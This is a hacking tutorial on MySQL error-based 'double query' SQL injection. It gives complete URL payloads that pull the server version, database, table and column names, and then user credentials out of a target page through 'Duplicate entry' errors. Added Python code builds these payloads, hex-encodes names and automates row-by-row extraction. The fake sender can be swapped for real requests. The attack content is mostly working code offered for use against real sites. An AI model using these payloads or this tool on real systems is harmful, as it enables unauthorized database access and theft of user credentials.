Double Query
This works in the same way as error-based injection, but the error-based query is doubled into a single statement (an inner query nested inside an outer one), so that we again get a useful error message back.
When should you use error-based or double query injection? When you switch over to UNION SELECT statements and the page returns an error saying something like:
Case 1:
The used SELECT statements have a different number of columns.
Case 2:
Unknown column '1'
Case 3:
Nothing is returned at all, and you cannot find the column positions anywhere in the page content.
In all of these cases you can fall back to error-based (double query) injection.
Short explanation:
I have not explained this well so far, so let me take the time to make it clear.
This method is almost exactly the same as error-based injection, but it uses two queries in one statement: an inner SELECT that fetches the value we want (the version, a schema name, a row of a table) and an outer SELECT with count(*) ... GROUP BY over information_schema.tables that turns that value into an error.
The GROUP BY key is concat(<our value>, floor(rand(0)*2)). MySQL evaluates the grouping expression more than once per row, and rand(0) always returns the same fixed sequence, so by the third row MySQL tries to insert a group key that already exists and aborts with "Duplicate entry '...' for key ...". The duplicate key is printed in the error, and our value is embedded in it.
You can see this as forcing the database into a conflict it has to report, where the report contains the answer we asked for. Two things are required: the application must display MySQL errors, and the table we group over must have at least three rows (information_schema.tables always does).
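The mechanism just described, as an added model that is not code from this tutorial and talks to no database: it replays how MySQL evaluates a GROUP BY key that contains rand(0), once to look the group up and again when a new group is inserted. The values returned by floor_rand0_sequence() are an assumption (the first values the fixed seed 0 is observed to produce on MySQL 5.x); only the first three, 0 1 1, matter for the error to fire.

```python
# Added model of the MySQL behaviour behind the "double query" trick. It is not
# code from the tutorial and talks to no database: it only imitates how MySQL
# evaluates a GROUP BY key when the key contains rand(0).


def floor_rand0_sequence():
    """Values MySQL yields for floor(rand(0)*2) on consecutive evaluations.

    Assumption: these are the first values produced by the fixed seed 0 as
    observed on MySQL 5.x. rand(0) is used precisely because the sequence is
    the same on every run, so the collision below is guaranteed rather than
    probabilistic (a plain rand() may or may not collide).
    """
    return [0, 1, 1, 0, 1, 1]


def simulate_group_by(rows, key_values, leaked):
    """Replay MySQL's temporary-table GROUP BY over `rows` input rows.

    For each row the grouping expression is evaluated once to look the group
    up. If no group exists yet, the expression is evaluated AGAIN to build the
    row that is inserted. Every evaluation advances rand(0), so the inserted
    key can differ from the looked-up key, and a later row then tries to insert
    a key that is already present. Returns (rows_processed, duplicate_key);
    duplicate_key is None when the statement would have completed normally.
    """
    next_key = iter(key_values)
    groups = {}
    for row in range(1, rows + 1):
        lookup = f"{leaked}{next(next_key)}"
        if lookup in groups:
            groups[lookup] += 1           # group exists: plain count(*) increment
            continue
        insert = f"{leaked}{next(next_key)}"   # re-evaluated when inserting
        if insert in groups:
            return row, insert            # MySQL raises ER_DUP_ENTRY (1062) here
        groups[insert] = 1
    return rows, None


def double_query_error(leaked, key_values=None):
    """Error text the application would echo for a leaked value, or None.

    The trailing digit is the floor(rand(0)*2) part of the key, which is why
    the raw message reads '~'5.1.65-cll'~1' while the tutorial prints only the
    value between the ~' ... '~ markers. Older servers say "for key 1", newer
    ones "for key 'group_key'".
    """
    keys = key_values if key_values is not None else floor_rand0_sequence()
    # information_schema.tables always has far more than the three rows needed.
    _, dup = simulate_group_by(3, keys, leaked)
    if dup is None:
        return None
    return f"Duplicate entry '{dup}' for key 'group_key'"


if __name__ == "__main__":
    print(double_query_error("~'5.1.65-cll'~"))
    # A key that never varies never collides: this is why concat(value) alone
    # in the GROUP BY would not produce the error.
    print(double_query_error("~'5.1.65-cll'~", [1] * 6))
```

The second call shows the failure mode: with a constant key every row lands in the same group and the statement finishes without an error, so the leaked value never reaches the page.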
Get the MySQL Version
Before you work your way through the rest of this tutorial, compare the query below with the one from error-based injection.
There are a lot of differences between the two queries; don't mix them up.
Our query for the version (double query):
+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Now what does this extremely large query tell us?
We again select several things with concat(): version() is cast to char and wrapped in 0x7e,0x27 (the characters ~') so it stands out in the error, and the double query part (count(*), floor(rand(0)*2) and GROUP BY over information_schema.tables) makes MySQL raise a duplicate-entry error that contains it.
We take it from information_schema (the database), and we add "and 1=1" at the end of our query to keep the condition true.
Error message:
Duplicate entry '5.1.65-cll' for key 1
It is a must to keep your queries clean, so I again advise using Hackbar, because a single mistake results in an error that carries no information.
We don't want that to happen, do we? Let us get the database name.
Get the Database Name
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
As you have seen with error-based injection, the LIMIT here is what matters if you want all the database names.
I won't explain everything as I usually do; I will only add what is new, which really reduces my writing time.
Here we select schema_name (the database name) as characters from information_schema.schemata. The first LIMIT (LIMIT 0,1) returns only the first database; increase it to LIMIT 1,1, LIMIT 2,1 and so on until you have all database names.
Error code:
Duplicate entry 'Ignotus_1' for key 1
Our database is Ignotus_1. Now it is important to write down the database name.
Get the Table Names
!! Where the query says 0xIgnotus_1, put your database name as a hex literal: for Ignotus_1 that is 0x49676e6f7475735f31. The 0x prefix is IMPORTANT: it tells MySQL to read the bytes as a string, so no quotes are needed in the injected query. !!
Our query to extract the table names:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+Where+table_schema=0xIgnotus_1+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+Where+table_schema=0xIgnotus_1+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
As we have learned a few times now, the LIMIT is what gets us all the tables: keep increasing the first LIMIT in the query (the one after our database name in hex) until you have all of them.
Short explanation of what's new in our query:
We again want the table names as characters, shown in our error output, and we take them from information_schema.tables WHERE table_schema equals our database name in hex, with a LIMIT to walk through all the tables.
Now you should have a list of table names; look for a useful one.
Mine is USERS. As with error-based injection, we now want the column names of that table.
Error code:
Duplicate entry 'USERS' for key 1
Get the Column Names
!! Where the query says 0xUSERS, put the table name you are going to use as a hex literal (USERS is 0x5553455253). Don't forget the 0x; it has to be there for MySQL to translate it. !!
Another mind-blowing query for extracting the columns:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+Where+table_schema=0xIgnotus_1+AND+table_name=0xUSERS+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+Where+table_schema=0xIgnotus_1+AND+table_name=0xUSERS+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Yet again there is a LIMIT, the first one after our database name in hex; increasing it gives us all the columns.
Short explanation of our new vector:
We want the column names from information_schema.columns for our database (in hex) and for the table we chose (also in hex).
Error code:
Duplicate entry 'Usernames' for key 1
Second error, after increasing the LIMIT:
Duplicate entry 'Passwords' for key 1
Now we want to extract all the information we can get from these columns: Username and Password.
Extracting Information from the Columns
Finally, finally and finally we are getting to the end; I am getting bored writing anyway!
This is the part where we get what we came for!
!! First of all, our query needs a little change again.
Where it says USERS.Username, put your table name and then your column name.
Yes, this time we need two queries, one for the usernames and one for the passwords. And where it says `database_name`.table_name in the FROM clause, put your database and table name (Ignotus_1 and USERS in our case) as plain identifiers, not in hex this time. LIMIT N,1 walks through the rows: N=0 is the first row, N=1 the second, and so on. !!
This is our query to extract all data from our columns:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(0x7e,0x27,cast(USERS.Username+as+char),0x27,0x7e)+FROM+`database_name`.table_name+LIMIT+N,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(0x7e,0x27,cast(USERS.Username+as+char),0x27,0x7e)+FROM+`database_name`.table_name+LIMIT+N,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Error message:
Duplicate entry 'uSploit' for key 1
For the passwords we only need to change Username into Password and execute again.
This results in an error that gives us the password.
Error message:
Duplicate entry '4c0e8eb3ed67f58dc56e724e5297a598n' for key 1
Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598n
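The whole procedure above (version, database names, table names, column names, row data) uses one skeleton with a different inner SELECT each time and a LIMIT that is stepped by hand. The following is an added example, not code from the tutorial: a small Python helper that builds each of those payloads from the same skeleton, hex-encodes names the way the tutorial asks, parses the leaked value back out of the "Duplicate entry" error text, and steps LIMIT 0,1 / LIMIT 1,1 / ... automatically until the error stops carrying a value. The target URL, the parameter name id, and the responses in FAKE_RESPONSES are constructed for illustration; nothing is sent over the network.

```python
import re

# Wrap an expression in ~'...'~ (0x7e = '~', 0x27 = "'") so the leaked value is
# easy to spot, and to parse, inside the "Duplicate entry" error text.
WRAP = "concat(0x7e,0x27,cast({expr} as char),0x27,0x7e)"


def hex_literal(name):
    """MySQL hex-string literal for a name: 'Ignotus_1' -> 0x49676e6f7475735f31.

    The 0x prefix makes MySQL treat the bytes as a string, so the injected
    query needs no quotes (quotes are often escaped or filtered by the app).
    """
    return "0x" + name.encode("utf-8").hex()


def double_query(inner_select):
    """Wrap one scalar SELECT in the tutorial's double-query skeleton.

    count(*) ... group by x over information_schema.tables makes MySQL evaluate
    the group key more than once; floor(rand(0)*2) makes the key collide, and
    the collision is reported as "Duplicate entry <key>", key included.
    """
    return ("and(select 1 from(select count(*),concat((select (select ("
            + inner_select
            + ")) from information_schema.tables limit 0,1),floor(rand(0)*2))x"
            " from information_schema.tables group by x)a) and 1=1")


def version_payload():
    return double_query("select " + WRAP.format(expr="version()"))


def schema_payload(n):
    return double_query("SELECT distinct " + WRAP.format(expr="schema_name")
                        + f" FROM information_schema.schemata LIMIT {n},1")


def table_payload(db, n):
    return double_query("SELECT distinct " + WRAP.format(expr="table_name")
                        + " FROM information_schema.tables WHERE table_schema="
                        + hex_literal(db) + f" LIMIT {n},1")


def column_payload(db, table, n):
    return double_query("SELECT distinct " + WRAP.format(expr="column_name")
                        + " FROM information_schema.columns WHERE table_schema="
                        + hex_literal(db) + " AND table_name=" + hex_literal(table)
                        + f" LIMIT {n},1")


def data_payload(db, table, column, n):
    # Backtick-quoted identifiers here: the FROM clause names real objects,
    # and identifiers cannot be written as hex literals.
    return double_query("SELECT " + WRAP.format(expr=f"`{table}`.`{column}`")
                        + f" FROM `{db}`.`{table}` LIMIT {n},1")


def inject_url(base, param, value, payload):
    """The GET request the tutorial pastes into Hackbar ('+' stands for space)."""
    return f"{base}?{param}={value}+" + payload.replace(" ", "+")


# Accepts both the raw server text (Duplicate entry '~'v'~1' for key 'group_key')
# and the trimmed form the tutorial prints (Duplicate entry 'v' for key 1).
DUP_RE = re.compile(r"Duplicate entry '(?:~')?(.*?)(?:'~\d)?' for key")


def extract_leak(response_text):
    """Leaked value from a page containing the duplicate-entry error, or None."""
    m = DUP_RE.search(response_text)
    return m.group(1) if m else None


def enumerate_rows(build_payload, send, max_rows=100):
    """Step LIMIT 0,1; LIMIT 1,1; ... until the response carries no value."""
    found = []
    for n in range(max_rows):
        value = extract_leak(send(build_payload(n)))
        if value is None:
            break
        found.append(value)
    return found


# Constructed stand-in for the vulnerable page: answers each payload with the
# error a server would print at that step (no network access, no real target).
FAKE_RESPONSES = {
    schema_payload(0): "SQL error: Duplicate entry '~'information_schema'~1' for key 'group_key'",
    schema_payload(1): "SQL error: Duplicate entry '~'Ignotus_1'~1' for key 'group_key'",
}


def fake_send(payload):
    # Past the last row the subquery yields nothing useful and the page renders normally.
    return FAKE_RESPONSES.get(payload, "<html>normal page, no error</html>")


if __name__ == "__main__":
    print(inject_url("http://www.[site].com/page.php", "id", "1", version_payload()))
    print(enumerate_rows(schema_payload, fake_send))
    print(inject_url("http://www.[site].com/page.php", "id", "1",
                     data_payload("Ignotus_1", "USERS", "Username", 0)))
```

Swap fake_send for a function that performs the real GET and returns the response body, and enumerate_rows walks each step (tables with table_payload, columns with column_payload, rows with data_payload) the same way; the extractor stops as soon as a response no longer contains a duplicate-entry error, which is also the signal that the query itself broke and needs to be checked rather than stepped further.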